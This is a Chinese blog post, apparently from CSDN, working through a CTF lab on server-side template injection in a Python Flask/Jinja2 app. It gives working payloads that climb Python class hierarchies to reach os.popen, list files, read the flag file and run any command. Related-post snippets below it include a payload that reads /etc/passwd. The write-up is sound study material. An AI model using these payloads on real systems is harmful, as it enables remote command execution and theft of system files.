[wp] Web_python_template_injection 攻防世界

最新推荐文章于 2024-07-06 11:42:12 发布
最新推荐文章于 2024-07-06 11:42:12 发布
阅读量1.3k 收藏 7
点赞数 5
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zss192/article/details/104199520
版权

题目描述:
在这里插入图片描述

打开题目我们看到
在这里插入图片描述
提示python模板注入,尝试{{1+1}}看看{{}}内的代码是否被执行
在这里插入图片描述由上图可知代码被执行确实存在模板注入

1.右键查看源码御剑扫描均没有任何有用信息,推测flag在某一文件里,所以我们要先获得所有文件看看能否发现疑似含有flag的文件

2.调用os模块的popen执行ls打印所有文件

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("ls").read()}}

当然我们也可以用os模块的listdir来打印文件

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir("./")}}

在这里插入图片描述
发现fl4g文件,flag应该就在这个文件里,接下来想办法读取这个文件

3.执行cat命令查看目标文件

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("cat fl4g").read()}}

在这里插入图片描述
得到flag,大功告成!

总结:这类题我们可以用下面这条语句执行命令
{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("要执行的语句").read()}}

若不明白原理,可结合我这篇博客https://blog.csdn.net/zss192/article/details/104200493理解。

夏日 の blog
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
攻防世界--WEB进阶--Web_python_template_injection
m0_46267075的博客
05-28 1170
好难啊
攻防世界Web_python_template_injection
MIGENGKING的博客
04-23 3515
打开题目: 题目提示为Python模块注入: 1首先判断一下: 网址输入“{{7+7}}”页面显示14,说面存在“SSTI” : SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对python、php、java的一些网站处理框架,比如Python的jinja...
攻防世界WEB---Web_python_template_injection
Red Rapefruit
07-24 593
有关python模板注入漏洞的学习
攻防世界 Web_python_template_injection(flask模版注入)
最新发布
weixin_73399382的博客
07-06 1299
通过调用__class__.__mro__,可以获取该类的方法解析顺序(Method Resolution Order,MRO),它是一个元组,按照查找方法时的顺序列出了对象所属类及其父类。解析:"".__class__.__mro__[2].__subclasses__()方法返回的是可用类(classes),而不是对象(objects)。综上所述,"".__class__.__mro__[2].__subclasses__()方法返回的是可用类(classes)SSTI与这个方法密不可分。
攻防世界Web_python_template_injectionweb进阶)
my_name_is_sy的博客
06-29 2006
考点为模板漏洞及其利用。
攻防世界-web-Web_python_template_injection
wuh2333的博客
06-16 2348
攻防世界python模板注入
攻防世界-web Web_python_template_injection
m0_48108919的博客
02-11 3354
提示python模板注入 随便输入个/test目录查看,提示not found,并且把我们的输入test进行了输出,可以尝试在这个位置进行注入 1.判断模板引擎: 找到收藏已久的模板注入图 首先从${7*7}开始测试:并没有执行 继续测试{{7*7}}:执行成功,输出了49 因为Twig是php的模板,所有可以确定模板为Jinja2 2.直接百度搜索Jinja2模板注入漏洞 参考:https://blog.csdn.net/qq_36374896/arti...
攻防世界Web_python_template_injection
qq_42728977的博客
01-11 307
之前做过一次python沙盒逃逸的题,但是当时只是看WP没有仔细地深入,这次仔细的探究一下这个漏洞的原理和防御。在这里只是写一点开端,后续再深入,因为我看资料发现这个漏洞牵扯到的东西挺多的。 题目 Web_python_template_injection 原理 python模块注入、python沙河逃逸 环境 firefox、hackbar 流程 在题目的URL后面添加如下命令,就可以命令执行了...
攻防世界 web高手进阶区 9分题 Web_python_flask_sql_injection
闵行小鱼塘
10-12 1038
继续ctf的旅程,开始攻防世界web高手进阶区的9分题,本文是Web_python_flask_sql_injection的writeup
CTF_WP-攻防世界web题解,颠覆认知
m0_61331491的博客
04-07 978
这个是数据流;php://input是输入流,从post中输入直接查看robots.txt文件查看隐藏的文件又是一道php伪协议,但是之前的input或者data都不管用了,三道题明明长得一模一样,却只能用不同的伪协议不理解,再次查找,发现不同协议的使用条件:https://www.cnblogs.com/Article-kelp/p/14581703.html不同协议的使用条件。
攻防世界-web高手进阶区
zji
04-25 6516
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
攻防世界-web进阶区
楼阁de猫的博客
10-30 974
目录baby_webTraining-WWW-Robots baby_web 题目描述:想想初始页面是哪个 打开链接看到这个界面 这里有两种解法 法一:我们输入index.php ,就会立即跳转到1.php 那我们就对index.php抓包看看 在请求头看到flag:flag{very_baby_web} 法二:题目提示说初始界面,但是url后面会自动跳转到1.php,我们可以在控制台找到初始界面, 按F12进入控制台点开原始的网址就可以看到 Training-WWW-Robots 打开链接是这样一个
攻防世界】十二、Web_python_template_injection
Hi~ 土拨鼠
09-16 1094
步骤 打开所给场景,根据所给提示是python的模板注入 尝试一下漏洞是否存在:payload:/{{1+1}} 发现{{}}中的表达式被执行,构造命令执行payload:{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}} 发现flag,将上述payload中的ls改为cat fl4g即可获得目标:{{''.__class__.__mro__[2].__subcl.
web python template injection_攻防世界WEB高手进阶之python_template_injection
weixin_39705193的博客
12-10 128
python模板注入看了一堆文章,也不是看的很明白,反而把题目做出来了大概思路如下简单探测返回说明服务器执行了{{}}里面这一段代码利用{{ config.items() }}可以查看服务器的配置信息读取passwd信息{{ [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }}执行成功Python3代码执行下面这一段...
攻防世界 Web_python_template_injection
feng的博客
09-03 548
前言 这是一道关于python的flask模板注入的题目,刚碰到这个题目的时候我对于flask和模板注入是没有接触过的,因此上网查找相关知识并结合攻防世界给出的WP做出了这个题目。 做题前知识点的了解 https://xz.aliyun.com/t/3679 这篇博客对于我这样的萌新来说非常友好,对于flask的ssti模板注入讲解的很好,推荐一看。看完这个,就对flask的模板注入有了一个大致的了解,但是对于如何应用可能有些迷茫,下面结合攻防世界的这个题目来更加深入的了解。 WP 作为一个萌新,刚打开这个
攻防世界Web_python_template_injection
2302_79800344的博客
04-01 1029
【代码】【攻防世界Web_python_template_injection
攻防世界CTF Web_python_template_injection
cadandme的博客
02-15 3680
记录模块注入学习过程 题目:Web_python_template_injection提醒是模块注入 在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 模块注入测试: 网址输入“{{1*21}}”页面显示21,说面存在“SSTI” 在其他大佬的博客中收集的相关知识: SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对pyt
Member 'make_shared' cannot have template
07-28
wp1 {p1}; // p1 owns the memory. \[1\] 引用\[2\]:You break this by usingweak_ptr. The "owner" typically useshared_ptrand the "owned" use aweak_ptrto its parent, and convert ittemporarilytoshared_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值